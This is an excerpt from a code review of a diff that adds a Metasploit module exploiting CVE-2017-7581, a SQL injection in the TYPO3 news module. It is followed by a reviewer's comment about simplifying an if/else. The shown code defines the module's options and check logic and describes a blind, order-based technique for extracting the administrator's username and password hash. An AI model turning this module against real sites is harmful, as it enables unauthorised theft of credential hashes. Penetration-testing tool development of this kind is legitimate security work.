modules/auxiliary/admin/http/typo3_news_module_sqli.rb

```diff
@@ -0,0 +1,201 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'TYPO3 News Module SQL Injection',
+      'Description'    => %q{
+         This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php
+         in the news module 5.3.2 and earlier, allows unauthenticated user to execute arbitrary
+         SQL commands via vectors involving overwriteDemand for order and OrderByAllowed.
+         This essentially means an attacker can obtain user credentials hashes.
+
+         This module tries to extract username and password hash of the administrator user.
+         It tries to inject sql and check every letter of a pattern, to see
+         if it belongs to the username or password it tries to alter the ordering of results. If
+         the letter doesn't belong to the word being extracted then all results are inverted
+         (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs
+         to the word being extracted then the results are in proper order (News #1 appers before News #2,
+         so Pattern1 before Pattern2)
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Charles Fol', # initial discovery, POC
+          'Marco Rivoli <marco.rivoli.nvh<at>gmail.com>' #MSF code
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-7581'  ],
+          [ 'URL', 'http://www.ambionics.io/blog/typo3-news-module-sqli' ], # Advisory
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Apr 6 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('ID', [true, 'The id of TYPO3 news page', '1']),
+        OptString.new('PATTERN1', [false, 'Pattern of the first article title', 'Article #1']),
+        OptString.new('PATTERN2', [false, 'Pattern of the second article title', 'Article #2'])
+      ])
+  end
+
+  def check
+    # the only way to test if the target is vuln
+    if test_injection
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def test_injection()
+    pattern1, pattern2 = try_autodetect_patterns
+    if pattern1 == '' or pattern2 == ''
+      print_error("Impossible to determine pattern automatically, aborting...")
+      return false
+    else
```

Comment:
The `if` statement will return if true, so you can move all of the code out of the `else` statement below.